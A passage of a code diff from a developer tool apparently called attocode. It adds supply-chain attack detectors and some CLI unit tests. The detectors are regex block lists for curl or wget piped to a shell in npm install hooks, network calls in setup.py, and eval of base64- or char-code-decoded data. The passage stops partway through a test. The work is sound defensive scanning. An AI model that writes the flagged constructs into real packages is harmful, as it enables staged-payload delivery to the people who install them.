re.compile(r"\b(?:curl|wget|fetch)\b[^|]*\|\s*(?:ba)?sh\b", re.IGNORECASE), + "curl/wget piped to shell in install hook"), + ("hook_remote_script", re.compile(r"https?://\S+\.(?:sh|py|exe|dll|so|dylib)\b", re.IGNORECASE), + "remote script fetch in install hook"), + ("hook_popen", re.compile(r"\bpopen\s*\("), + "popen call in install hook"), + ("hook_system_call", re.compile(r"\bsystem\s*\("), + "system call in install hook"), + ("hook_child_spawn", re.compile(r"\b(?:spawnSync|execSync|execFile|execFileSync)\s*\("), + "child_process spawn/exec variant in install hook"), +] + +# Suspicious patterns in setup.py (supply-chain attacks: ctx, W4SP, LiteLLM). +# setup.py should never make network calls; install-time fetches are a classic +# vector for staged-payload delivery. +_SUSPICIOUS_SETUP_PY_PATTERNS: list[tuple[str, "re.Pattern[str]", str]] = [ + ("setup_urllib_fetch", + re.compile(r"\burllib(?:\.request)?\.urlopen\s*\("), + "urllib network fetch"), + ("setup_urlretrieve", + re.compile(r"\burlretrieve\s*\("), + "urlretrieve fetch"), + ("setup_http_client_call", + re.compile(r"\b(?:requests|httpx|aiohttp)\.(?:get|post|put|delete|head)\s*\("), + "HTTP client call"), + ("setup_socket_connect", + re.compile(r"\bsocket\.create_connection\s*\("), + "raw socket connection"), +] + @dataclass(slots=True) class DependencyFinding: @@ -70,6 +110,11 @@ def audit(self) -> list[DependencyFinding]: if pkg_json.exists(): findings.extend(self._audit_package_json(pkg_json)) + # Python: setup.py (supply-chain network-at-install-time check) + setup_py = root / "setup.py" + if setup_py.exists(): + findings.extend(self._audit_setup_py(setup_py)) + return findings def _audit_pyproject(self, path: Path) -> list[DependencyFinding]: @@ -155,6 +200,73 @@ def _audit_package_json(self, path: Path) -> list[DependencyFinding]: source_file=str(path), )) + findings.extend(self._audit_install_hooks(data, path)) + return findings + + def _audit_install_hooks(self, data: dict, path: Path) -> list[DependencyFinding]: + """Flag package.json install hooks with obfuscation/remote-fetch patterns. + + Supply-chain attackers (GlassWorm-class) place obfuscated one-liners in + preinstall/postinstall/install scripts that execute automatically on + ``npm install``. This detects the most common indicators. + + Note: only the root-level package.json is audited (same as pinning check). + Monorepo workspace package.json files are not traversed. + """ + findings: list[DependencyFinding] = [] + scripts = data.get("scripts", {}) + if not isinstance(scripts, dict): + return findings + for hook in ("preinstall", "install", "postinstall"): + script = scripts.get(hook) + if not isinstance(script, str) or not script.strip(): + continue + for _name, regex, description in _SUSPICIOUS_HOOK_TOKENS: + if regex.search(script): + findings.append(DependencyFinding( + package=hook, + version_spec=script[:200], + severity=Severity.HIGH, + cwe_id="CWE-506", + message=f"Suspicious {hook} script: {description}", + recommendation=( + f"Review the '{hook}' script in package.json; " + "supply-chain attackers use install hooks to run " + "obfuscated one-liners on `npm install`" + ), + source_file=str(path), + )) + break # one finding per hook is enough + return findings + + def _audit_setup_py(self, path: Path) -> list[DependencyFinding]: + """Flag network calls in setup.py (supply-chain attack vector). + + setup.py executes arbitrary Python at install time. Legitimate setup + scripts only define metadata and dependencies; network fetches there + are almost always a staged-payload delivery mechanism (ctx/W4SP/ + LiteLLM style attacks). + """ + findings: list[DependencyFinding] = [] + try: + content = path.read_text(encoding="utf-8") + except OSError: + return findings + for name, regex, description in _SUSPICIOUS_SETUP_PY_PATTERNS: + if regex.search(content): + findings.append(DependencyFinding( + package="setup.py", + version_spec=name, + severity=Severity.HIGH, + cwe_id="CWE-506", + message=f"setup.py contains {description} — supply-chain attack pattern", + recommendation=( + "Setup scripts should not make network calls; " + "install-time fetches are a classic supply-chain " + "vector (cf. PyPI ctx, W4SP stealer)" + ), + source_file=str(path), + )) return findings def _check_pinning(self, dep_spec: str, source_file: str) -> DependencyFinding | None: diff --git a/src/attocode/integrations/security/matcher.py b/src/attocode/integrations/security/matcher.py new file mode 100644 index 00000000..ce855835 --- /dev/null +++ b/src/attocode/integrations/security/matcher.py @@ -0,0 +1,44 @@ +"""Shared pattern-matching iteration for security scanners. + +Both the filesystem-based scanner (`scanner.py`) and the DB-backed scanner +(`security_scanner_db.py`) need to walk lines of a file, apply per-pattern +language filtering, skip comment lines (unless a pattern opts in via +``scan_comments``), and yield regex hits. This module centralises that logic. + +Callers construct their own finding record types — this generator only +reports (line_number, line_text, matched_pattern). +""" + +from __future__ import annotations + +from collections.abc import Iterable, Iterator + +from attocode.integrations.security.patterns import SecurityPattern + + +def iter_pattern_matches( + content: str, + patterns: Iterable[SecurityPattern], + language: str, +) -> Iterator[tuple[int, str, SecurityPattern]]: + """Yield (line_number, line, pattern) for every pattern hit in ``content``. + + Filters applied per line × pattern: + - Language filter: skip patterns scoped to other languages. + - Comment-line skip: lines starting with ``#`` or ``//`` are skipped + unless the pattern sets ``scan_comments=True`` (e.g. for stego payload + detectors that specifically want to scan comments). + + A line may yield multiple matches if it hits multiple patterns; each + produces a separate tuple. + """ + for line_no, line in enumerate(content.splitlines(), 1): + stripped = line.lstrip() + is_comment = stripped.startswith("#") or stripped.startswith("//") + for pat in patterns: + if pat.languages and language not in pat.languages: + continue + if is_comment and not pat.scan_comments: + continue + if pat.pattern.search(line): + yield line_no, line, pat diff --git a/src/attocode/integrations/security/patterns.py b/src/attocode/integrations/security/patterns.py index b5f78881..9038f4e9 100644 --- a/src/attocode/integrations/security/patterns.py +++ b/src/attocode/integrations/security/patterns.py @@ -41,6 +41,7 @@ class SecurityPattern: message: str recommendation: str languages: list[str] = field(default_factory=list) # empty = all languages + scan_comments: bool = False # if True, scan comment lines too (for stego payloads) # --------------------------------------------------------------------------- @@ -138,94 +139,153 @@ class SecurityPattern: # These regex patterns DETECT dangerous constructs in scanned source files. # They do NOT themselves call or use any dangerous functions. -_ANTI_PATTERN_DEFS: list[tuple[str, str, str, str, str, str, list[str]]] = [ - # (name, regex, severity, cwe, message, recommendation, languages) +_ANTI_PATTERN_DEFS: list[tuple[str, str, str, str, str, str, list[str], bool]] = [ + # (name, regex, severity, cwe, message, recommendation, languages, scan_comments) # Python detectors ("python_dynamic_eval", r"""\beval\s*\(""", "high", "CWE-95", "Dynamic code evaluation detected — code injection risk", "Use ast.literal_eval() for data, or avoid dynamic evaluation", - ["python"]), + ["python"], False), ("python_dynamic_exec", r"""\bexec\s*\(""", "high", "CWE-95", "Dynamic code execution detected — code injection risk", "Avoid dynamic code execution; use structured alternatives", - ["python"]), + ["python"], False), ("python_shell_true", r"""subprocess\.\w+\([^)]*shell\s*=\s*True""", "high", "CWE-78", "subprocess with shell=True — command injection risk", "Use subprocess with shell=False and pass args as list", - ["python"]), + ["python"], False), ("python_shell_true_standalone", r"""shell\s*=\s*True""", "medium", "CWE-78", "shell=True detected — possible command injection risk (check if used with subprocess)", "Use subprocess with shell=False and pass args as list", - ["python"]), + ["python"], False), ("python_pickle_loads", r"""pickle\.loads?\s*\(""", "high", "CWE-502", "pickle.load/loads — deserialization of untrusted data risk", "Use json or other safe serialization formats", - ["python"]), + ["python"], False), ("python_yaml_unsafe", r"""yaml\.load\s*\([^,)]+\)""", "medium", "CWE-502", "yaml.load() without SafeLoader — arbitrary code execution risk", "Use yaml.safe_load() or yaml.load(data, Loader=SafeLoader)", - ["python"]), + ["python"], False), ("python_sql_fstring", r"""(?:cursor\.execute|\.execute)\s*\(\s*f['"]""", "high", "CWE-89", "f-string in SQL query — SQL injection risk", "Use parameterized queries with ? or %s placeholders", - ["python"]), + ["python"], False), ("python_verify_false", r"""verify\s*=\s*False""", "medium", "CWE-295", "SSL verification disabled (verify=False)", "Enable SSL verification; use a CA bundle if needed", - ["python"]), + ["python"], False), ("python_weak_hash", r"""hashlib\.(?:md5|sha1)\s*\(""", "low", "CWE-328", "Weak hash algorithm (MD5/SHA1) — not suitable for security", "Use hashlib.sha256() or hashlib.sha3_256() for security", - ["python"]), + ["python"], False), ("python_tempfile_insecure", r"""tempfile\.mktemp\s*\(""", "medium", "CWE-377", "tempfile.mktemp() — race condition vulnerability", "Use tempfile.mkstemp() or tempfile.NamedTemporaryFile()", - ["python"]), + ["python"], False), # JavaScript/TypeScript detectors ("js_dynamic_eval", r"""\beval\s*\(""", "high", "CWE-95", "Dynamic code evaluation detected — code injection risk", "Avoid dynamic evaluation; use JSON.parse() for data", - ["javascript", "typescript"]), + ["javascript", "typescript"], False), ("js_innerhtml", r"""\.innerHTML\s*=""", "medium", "CWE-79", "Direct innerHTML assignment — XSS risk", "Use textContent or a DOM sanitizer library", - ["javascript", "typescript"]), + ["javascript", "typescript"], False), ("js_dangerously_set", r"""dangerouslySetInnerHTML""", "medium", "CWE-79", "dangerouslySetInnerHTML — XSS risk in React", "Sanitize content with DOMPurify before rendering", - ["javascript", "typescript"]), + ["javascript", "typescript"], False), ("js_document_write", r"""document\.write\s*\(""", "medium", "CWE-79", "document.write() — XSS risk and bad practice", "Use DOM manipulation methods instead", - ["javascript", "typescript"]), + ["javascript", "typescript"], False), + # GlassWorm-class supply-chain detectors + ("invisible_unicode_run", + r"""[\u200B-\u200F\u2060-\u206F\uFE00-\uFE0F]{3,}|(?:[\U000E0000-\U000E007F]|[\U000E0100-\U000E01EF]){3,}""", + "high", "CWE-506", + "Run of invisible/non-rendering Unicode characters — possible steganographic payload (supply-chain attack)", + "Audit with 'hexdump -C' or 'cat -v'; legitimate source should not contain runs of zero-width/variation-selector/tag characters", + [], True), + ("js_eval_on_decoded", + r"""\b(?:eval|Function)\s*\(\s*(?:new\s+Function\s*\(\s*)?[^)]*?\b(?:atob|decodeURIComponent|unescape)\s*\(""", + "critical", "CWE-94", + "eval/Function() called on decoded data (atob/decodeURIComponent/unescape) — supply-chain obfuscation pattern", + "Never eval decoded strings; use JSON.parse() for data, or refactor to explicit logic", + ["javascript", "typescript"], False), + ("js_eval_on_buffer", + r"""\b(?:eval|Function)\s*\(\s*(?:new\s+Function\s*\(\s*)?[^)]*?Buffer\.from\s*\([^)]*?(?:['"]base64['"]|['"]hex['"])""", + "critical", "CWE-94", + "eval/Function() called on Buffer.from(..., 'base64'|'hex') decoded data — supply-chain obfuscation pattern", + "Never eval decoded Buffers; refactor to explicit logic", + ["javascript", "typescript"], False), + ("js_eval_on_fromcharcode", + r"""\b(?:eval|Function)\s*\(\s*(?:new\s+Function\s*\(\s*)?[^)]*?String\.fromCharCode\s*\(""", + "critical", "CWE-94", + "eval/Function() called on String.fromCharCode(...) — classic obfuscation pattern", + "Never eval char-code sequences; this is almost always malicious", + ["javascript", "typescript"], False), + ("python_eval_on_b64decode", + r"""\b(?:eval|exec)\s*\(\s*[^)]*?\b(?:b64decode|base64\.b64decode|urlsafe_b64decode)\s*\(""", + "critical", "CWE-94", + "eval/exec called on base64.b64decode(...) — supply-chain obfuscation pattern", + "Never eval decoded data; refactor to explicit logic", + ["python"], False), + ("python_exec_on_codecs_decode", + r"""\b(?:eval|exec)\s*\(\s*[^)]*?(?:\bcodecs\.decode\s*\(|\bbytes\.fromhex\s*\(|\bzlib\.decompress\s*\()""", + "critical", "CWE-94", + "eval/exec called on codecs.decode/bytes.fromhex/zlib.decompress — obfuscation pattern", + "Never eval decoded/decompressed data; refactor to explicit logic", + ["python"], False), + ("python_exec_on_marshal_loads", + r"""\b(?:eval|exec)\s*\(\s*[^)]*?\bmarshal\.loads\s*\(""", + "critical", "CWE-94", + "eval/exec called on marshal.loads(...) — code injection via deserialization", + "Never execute marshal-deserialized data from untrusted sources", + ["python"], False), + # Shai-Hulud / dynamic-require obfuscation: require() with string concatenation + # or template interpolation — used to evade literal 'child_process' string detection. + ("js_dynamic_require_concat", + r"""require\s*\(\s*(?:["'][^"']*["']\s*\+|`[^`]*\$\{)""", + "critical", "CWE-94", + "require() called with concatenated string or template interpolation — supply-chain obfuscation (Shai-Hulud style)", + "Use static string literals for require(); dynamic module loading is almost always an obfuscation indicator", + ["javascript", "typescript"], False), + # MDN explicitly warns that string-argument setTimeout/setInterval behaves like eval(). + # Legitimate callers pass functions; string arguments are near-universally obfuscation. + ("js_settimer_string_arg", + r"""\b(?:setTimeout|setInterval)\s*\(\s*["'`]""", + "high", "CWE-95", + "setTimeout/setInterval called with a string argument — behaves like eval()", + "Pass a function reference instead of a string; string args are implicit dynamic code execution", + ["javascript", "typescript"], False), ] ANTI_PATTERNS: list[SecurityPattern] = [ @@ -238,6 +298,7 @@ class SecurityPattern: message=msg, recommendation=rec, languages=langs, + scan_comments=scan_comments, ) - for name, regex, sev, cwe, msg, rec, langs in _ANTI_PATTERN_DEFS + for name, regex, sev, cwe, msg, rec, langs, scan_comments in _ANTI_PATTERN_DEFS ] diff --git a/src/attocode/integrations/security/scanner.py b/src/attocode/integrations/security/scanner.py index f474405c..1b8eca37 100644 --- a/src/attocode/integrations/security/scanner.py +++ b/src/attocode/integrations/security/scanner.py @@ -12,6 +12,7 @@ from dataclasses import dataclass, field from pathlib import Path +from attocode.integrations.security.matcher import iter_pattern_matches from attocode.integrations.security.patterns import ( ANTI_PATTERNS, SECRET_PATTERNS, @@ -35,6 +36,7 @@ _EXTRA_IGNORED_DIRS = {"site"} _PATTERN_DEFINITION_FILES = { os.path.normpath("src/attocode/integrations/security/patterns.py"), + os.path.normpath("tests/unit/code_intel/test_supply_chain_rules.py"), } @@ -234,32 +236,19 @@ def _scan_content( language: str, ) -> list[SecurityFinding]: """Scan file content against a set of patterns.""" - findings: list[SecurityFinding] = [] - - for pat in patterns: - # Skip language-specific patterns that don't apply - if pat.languages and language not in pat.languages: - continue - - for i, line in enumerate(content.split("\n"), 1): - # Skip comment lines (basic heuristic) - stripped = line.lstrip() - if stripped.startswith("#") or stripped.startswith("//"): - continue - - if pat.pattern.search(line): - findings.append(SecurityFinding( - severity=pat.severity, - category=pat.category, - file_path=file_path, - line=i, - message=pat.message, - recommendation=pat.recommendation, - cwe_id=pat.cwe_id, - pattern_name=pat.name, - )) - - return findings + return [ + SecurityFinding( + severity=pat.severity, + category=pat.category, + file_path=file_path, + line=line_no, + message=pat.message, + recommendation=pat.recommendation, + cwe_id=pat.cwe_id, + pattern_name=pat.name, + ) + for line_no, _line, pat in iter_pattern_matches(content, patterns, language) + ] @staticmethod def _compute_score(summary: dict[str, int]) -> int: diff --git a/src/attoswarm/__init__.py b/src/attoswarm/__init__.py index 619bc27d..761f46da 100644 --- a/src/attoswarm/__init__.py +++ b/src/attoswarm/__init__.py @@ -4,4 +4,4 @@ __all__ = ["__version__"] -__version__ = "0.2.15" +__version__ = "0.2.16" diff --git a/tests/unit/code_intel/test_cli_lifecycle.py b/tests/unit/code_intel/test_cli_lifecycle.py new file mode 100644 index 00000000..95f60f60 --- /dev/null +++ b/tests/unit/code_intel/test_cli_lifecycle.py @@ -0,0 +1,162 @@ +"""Focused tests for lifecycle-oriented CLI command handlers.""" + +from __future__ import annotations + +from pathlib import Path + +import pytest + + +def test_cmd_install_with_hooks_calls_install_and_install_hooks( + monkeypatch: pytest.MonkeyPatch, +) -> None: + from attocode.code_intel.cli import _cmd_install + + observed: dict[str, object] = {} + + monkeypatch.setattr( + "attocode.code_intel.installer.install", + lambda target, project_dir=".", scope="local": observed.setdefault( + "install", + (target, project_dir, scope), + ) or True, + ) + monkeypatch.setattr( + "attocode.code_intel.installer.install_hooks", + lambda target, project_dir=".": observed.setdefault("hooks", (target, project_dir)), + ) + + _cmd_install(["cursor", "--project", "/tmp/demo", "--global", "--hooks"]) + + assert observed["install"] == ("cursor", "/tmp/demo", "user") + assert observed["hooks"] == ("cursor", "/tmp/demo") + + +def test_cmd_install_missing_target_exits() -> None: + from attocode.code_intel.cli import _cmd_install + + with pytest.raises(SystemExit) as exc_info: + _cmd_install([]) + + assert exc_info.value.code == 1 + + +def test_cmd_uninstall_calls_hooks_and_uninstall(monkeypatch: pytest.MonkeyPatch) -> None: + from attocode.code_intel.cli import _cmd_uninstall + + observed: dict[str, object] = {} + + monkeypatch.setattr( + "attocode.code_intel.installer.uninstall_hooks", + lambda target, project_dir=".": observed.setdefault("hooks", (target, project_dir)), + ) + monkeypatch.setattr( + "attocode.code_intel.installer.uninstall", + lambda target, project_dir=".", scope="local": observed.setdefault( + "uninstall", + (target, project_dir, scope), + ) or True, + ) + + _cmd_uninstall(["cursor", "--project", "/tmp/demo", "--global"]) + + assert observed["hooks"] == ("cursor", "/tmp/demo") + assert observed["uninstall"] == ("cursor", "/tmp/demo", "user") + + +def test_cmd_uninstall_missing_target_exits() -> None: + from attocode.code_intel.cli import _cmd_uninstall + + with pytest.raises(SystemExit) as exc_info: + _cmd_uninstall([]) + + assert exc_info.value.code == 1 + + +def test_cmd_probe_install_missing_target_exits() -> None: + from attocode.code_intel.cli import _cmd_probe_install + + with pytest.raises(SystemExit) as exc_info: + _cmd_probe_install([]) + + assert exc_info.value.code == 1 + + +def test_cmd_bundle_help(capsys: pytest.CaptureFixture[str]) -> None: + from attocode.code_intel.cli import _cmd_bundle + + _cmd_bundle(["--help"]) + captured = capsys.readouterr() + + assert "attocode code-intel bundle export" in captured.out + assert "attocode code-intel bundle inspect" in captured.out + + +def test_cmd_bundle_unknown_subcommand_exits() -> None: + from attocode.code_intel.cli import _cmd_bundle + + with pytest.raises(SystemExit) as exc_info: + _cmd_bundle(["explode"]) + + assert exc_info.value.code == 1 + + +def test_cmd_bundle_export_uses_default_output_path( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_bundle + + observed: dict[str, object] = {} + + def _fake_export(project_dir: str, output_path: str) -> Path: + observed["project_dir"] = project_dir + observed["output_path"] = output_path + return Path(output_path) + + monkeypatch.chdir(tmp_path) + monkeypatch.setattr("attocode.code_intel.bundle.export_bundle", _fake_export) + + _cmd_bundle(["export", "--project", str(tmp_path / "repo")]) + captured = capsys.readouterr() + + assert observed["project_dir"] == str(tmp_path / "repo") + assert observed["output_path"] == str(tmp_path / "attocode-bundle-repo.tar.gz") + assert "Bundle exported to" in captured.out + + +def test_cmd_status_reports_installed_targets( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_status + + (tmp_path / ".cursor").mkdir() + (tmp_path / ".cursor" / "mcp.json").write_text( + '{"mcpServers": {"attocode-code-intel": {"command": "x"}}}', + encoding="utf-8", + ) + (tmp_path / ".codex").mkdir() + (tmp_path / ".codex" / "config.toml").write_text( + '[mcp_servers.attocode-code-intel]\ncommand = "x"\nargs = []\n', + encoding="utf-8", + ) + + monkeypatch.chdir(tmp_path) + monkeypatch.setattr("shutil.which", lambda tool: "/usr/bin/claude" if tool == "claude" else None) + monkeypatch.setattr( + "subprocess.run", + lambda *args, **kwargs: type("Result", (), {"stdout": "attocode-code-intel\n"})(), + ) + monkeypatch.setattr("attocode.code_intel.installer._get_user_config_dir", lambda _app: None) + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "attocode-code-intel") + + _cmd_status() + captured = capsys.readouterr() + + assert "Claude Code: installed" in captured.out + assert "Cursor: installed" in captured.out + assert "Codex: installed" in captured.out + assert "Entry point: attocode-code-intel (on PATH)" in captured.out diff --git a/tests/unit/code_intel/test_cli_maintenance_local.py b/tests/unit/code_intel/test_cli_maintenance_local.py new file mode 100644 index 00000000..1d08eebf --- /dev/null +++ b/tests/unit/code_intel/test_cli_maintenance_local.py @@ -0,0 +1,237 @@ +"""Focused tests for CLI maintenance command handlers.""" + +from __future__ import annotations + +import types +from pathlib import Path + +import httpx +import pytest + +from attocode.code_intel.config import CodeIntelConfig, RemoteConfig + + +def test_cmd_gc_local_mode_clears_cache( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_gc + + cache_dir = tmp_path / ".attocode" / "cache" + cache_dir.mkdir(parents=True) + (cache_dir / "a.tmp").write_text("x", encoding="utf-8") + (cache_dir / "b.tmp").write_text("y", encoding="utf-8") + + monkeypatch.setattr("attocode.code_intel.config.load_remote_config", lambda _project_dir: RemoteConfig()) + monkeypatch.setattr("attocode.code_intel.config.CodeIntelConfig.from_env", classmethod(lambda cls: CodeIntelConfig(database_url=""))) + + _cmd_gc(["--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert not any(cache_dir.iterdir()) + assert "Local mode: clearing AST cache" in captured.err + assert "GC complete." in captured.out + + +def test_cmd_gc_remote_mode_enqueues_jobs( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_gc + + observed: list[tuple[str, dict[str, str], dict[str, str]]] = [] + + class _Resp: + def __init__(self, status_code: int): + self.status_code = status_code + + class _Client: + def __init__(self, timeout: int): + self.timeout = timeout + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc, tb): + return False + + def post(self, url: str, json: dict[str, str], headers: dict[str, str]): + observed.append((url, json, headers)) + return _Resp(200) + + monkeypatch.setattr( + "attocode.code_intel.config.load_remote_config", + lambda _project_dir: RemoteConfig(server="https://example.com", token="tok", repo_id="repo-1"), + ) + monkeypatch.setattr("httpx.Client", _Client) + + _cmd_gc(["--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert len(observed) == 2 + assert observed[0][0] == "https://example.com/api/v1/jobs/enqueue" + assert observed[0][1] == {"function": "gc_orphaned_embeddings"} + assert observed[1][1] == {"function": "gc_unreferenced_content"} + assert "GC jobs enqueued on remote server." in captured.out + + +def test_cmd_gc_remote_mode_http_error_exits( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, +) -> None: + from attocode.code_intel.cli import _cmd_gc + + class _Client: + def __init__(self, timeout: int): + self.timeout = timeout + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc, tb): + return False + + def post(self, url: str, json: dict[str, str], headers: dict[str, str]): + raise httpx.HTTPError("boom") + + monkeypatch.setattr( + "attocode.code_intel.config.load_remote_config", + lambda _project_dir: RemoteConfig(server="https://example.com", token="tok", repo_id="repo-1"), + ) + monkeypatch.setattr("httpx.Client", _Client) + + with pytest.raises(SystemExit) as exc_info: + _cmd_gc(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + + +def test_cmd_reindex_local_no_provider_exits( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, +) -> None: + from attocode.code_intel.cli import _cmd_reindex + + observed: dict[str, object] = {} + + class _FakeMgr: + def __init__(self, root_dir: str): + observed["root_dir"] = root_dir + self.is_available = False + + def close(self) -> None: + observed["closed"] = True + + monkeypatch.setattr("attocode.code_intel.config.load_remote_config", lambda _project_dir: RemoteConfig()) + monkeypatch.setattr("attocode.integrations.context.semantic_search.SemanticSearchManager", _FakeMgr) + + with pytest.raises(SystemExit) as exc_info: + _cmd_reindex(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + assert observed["root_dir"] == str(tmp_path.resolve()) + assert observed["closed"] is True + + +def test_cmd_reindex_local_success( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_reindex + + observed: dict[str, object] = {} + cache_dir = tmp_path / ".attocode" / "cache" + cache_dir.mkdir(parents=True) + (cache_dir / "stale.tmp").write_text("x", encoding="utf-8") + index_file = tmp_path / ".attocode" / "index.json" + index_file.parent.mkdir(parents=True, exist_ok=True) + index_file.write_text("{}", encoding="utf-8") + + class _FakeMgr: + def __init__(self, root_dir: str): + observed["root_dir"] = root_dir + self.is_available = True + + def index(self) -> int: + observed["indexed"] = True + return 9 + + def close(self) -> None: + observed["closed"] = True + + monkeypatch.setattr("attocode.code_intel.config.load_remote_config", lambda _project_dir: RemoteConfig()) + monkeypatch.setattr("attocode.integrations.context.semantic_search.SemanticSearchManager", _FakeMgr) + + _cmd_reindex(["--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert observed["indexed"] is True + assert observed["closed"] is True + assert not index_file.exists() + assert "Indexed 9 chunks." in captured.out + assert "Reindex complete." in captured.out + + +def test_cmd_reindex_remote_missing_repo_id_exits( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, +) -> None: + from attocode.code_intel.cli import _cmd_reindex + + monkeypatch.setattr( + "attocode.code_intel.config.load_remote_config", + lambda _project_dir: RemoteConfig(server="https://example.com", token="tok", repo_id=""), + ) + + with pytest.raises(SystemExit) as exc_info: + _cmd_reindex(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + + +def test_cmd_reindex_remote_success( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_reindex + + observed: list[tuple[str, dict[str, str]]] = [] + + class _Resp: + status_code = 202 + + @staticmethod + def json() -> dict[str, str]: + return {"status": "queued"} + + text = "queued" + + class _Client: + def __init__(self, timeout: int): + self.timeout = timeout + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc, tb): + return False + + def post(self, url: str, headers: dict[str, str]): + observed.append((url, headers)) + return _Resp() + + monkeypatch.setattr( + "attocode.code_intel.config.load_remote_config", + lambda _project_dir: RemoteConfig(server="https://example.com", token="tok", repo_id="repo-1"), + ) + monkeypatch.setattr("httpx.Client", _Client) + + _cmd_reindex(["--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert observed == [("https://example.com/api/v1/repos/repo-1/index", {"Authorization": "Bearer tok"})] + assert "Reindex triggered on remote server." in captured.out diff --git a/tests/unit/code_intel/test_cli_ops.py b/tests/unit/code_intel/test_cli_ops.py new file mode 100644 index 00000000..3bf60137 --- /dev/null +++ b/tests/unit/code_intel/test_cli_ops.py @@ -0,0 +1,213 @@ +"""Focused tests for operational CLI command handlers.""" + +from __future__ import annotations + +import sys +import types +from pathlib import Path +from unittest.mock import MagicMock + +import httpx +import pytest + +from attocode.code_intel.config import RemoteConfig + + +def test_cmd_test_connection_requires_remote_config(tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_test_connection + + with pytest.raises(SystemExit) as exc_info: + _cmd_test_connection(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + + +def test_cmd_test_connection_success( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_test_connection + + observed: dict[str, object] = {} + + def _fake_get(url: str, headers=None, timeout: int = 10): + if url.endswith("/health"): + return MagicMock(status_code=200) + if url.endswith("/api/v1/auth/me"): + return MagicMock(status_code=200, json=lambda: {"email": "dev@example.com"}) + if url.endswith("/api/v1/repos/repo-1"): + return MagicMock(status_code=200, json=lambda: {"name": "demo"}) + if url.endswith("/api/v1/repos/repo-1/branches"): + return MagicMock(status_code=200, json=lambda: [{"name": "main"}]) + if url.endswith("/api/v2/repos/repo-1/stats"): + return MagicMock(status_code=200, json=lambda: {"total_files": 12, "embedded_files": 9}) + raise AssertionError(f"Unexpected GET {url}") + + def _fake_post(url: str, json: dict[str, object], headers=None, timeout: int = 10): + observed["notify"] = (url, json, headers) + return MagicMock(status_code=202) + + def _fake_connect(url: str, close_timeout: int, open_timeout: int): + observed["ws_url"] = url + return types.SimpleNamespace(close=lambda: observed.setdefault("ws_closed", True)) + + websockets_mod = types.ModuleType("websockets") + websockets_sync = types.ModuleType("websockets.sync") + websockets_client = types.ModuleType("websockets.sync.client") + websockets_client.connect = _fake_connect + websockets_sync.client = websockets_client + websockets_mod.sync = websockets_sync + monkeypatch.setitem(sys.modules, "websockets", websockets_mod) + monkeypatch.setitem(sys.modules, "websockets.sync", websockets_sync) + monkeypatch.setitem(sys.modules, "websockets.sync.client", websockets_client) + + monkeypatch.setattr( + "attocode.code_intel.config.load_remote_config", + lambda _project_dir: RemoteConfig(server="https://example.com", token="tok", repo_id="repo-1"), + ) + monkeypatch.setattr("httpx.get", _fake_get) + monkeypatch.setattr("httpx.post", _fake_post) + monkeypatch.setattr( + "subprocess.run", + lambda *args, **kwargs: MagicMock(returncode=0, stdout="main\n"), + ) + + _cmd_test_connection(["--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert "All checks passed!" in captured.out + assert observed["notify"][0] == "https://example.com/api/v1/notify/file-changed" + assert observed["ws_url"] == "wss://example.com/ws/repos/repo-1/events?token=tok" + assert observed["ws_closed"] is True + + +def test_cmd_watch_requires_remote_config( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, +) -> None: + from attocode.code_intel.cli import _cmd_watch + + watchfiles_mod = types.ModuleType("watchfiles") + watchfiles_mod.Change = types.SimpleNamespace(modified="modified", added="added", deleted="deleted") + watchfiles_mod.watch = lambda *args, **kwargs: iter(()) + monkeypatch.setitem(sys.modules, "watchfiles", watchfiles_mod) + monkeypatch.setattr("attocode.code_intel.config.load_remote_config", lambda _project_dir: RemoteConfig()) + + with pytest.raises(SystemExit) as exc_info: + _cmd_watch(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + + +def test_cmd_index_status( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_index + + progress = types.SimpleNamespace( + status="ready", + coverage=0.5, + indexed_files=10, + total_files=20, + elapsed_seconds=1.2, + ) + + class _FakeMgr: + def __init__(self, root_dir: str): + self.provider_name = "sentence-transformers" + + def get_index_progress(self): + return progress + + def is_index_ready(self) -> bool: + return True + + def close(self) -> None: + return None + + monkeypatch.setattr("attocode.integrations.context.semantic_search.SemanticSearchManager", _FakeMgr) + + _cmd_index(["--status", "--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert "Provider: sentence-transformers" in captured.out + assert "Coverage: 50% (10/20 files)" in captured.out + assert "Vector search active: True" in captured.out + + +def test_cmd_index_foreground( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, + capsys: 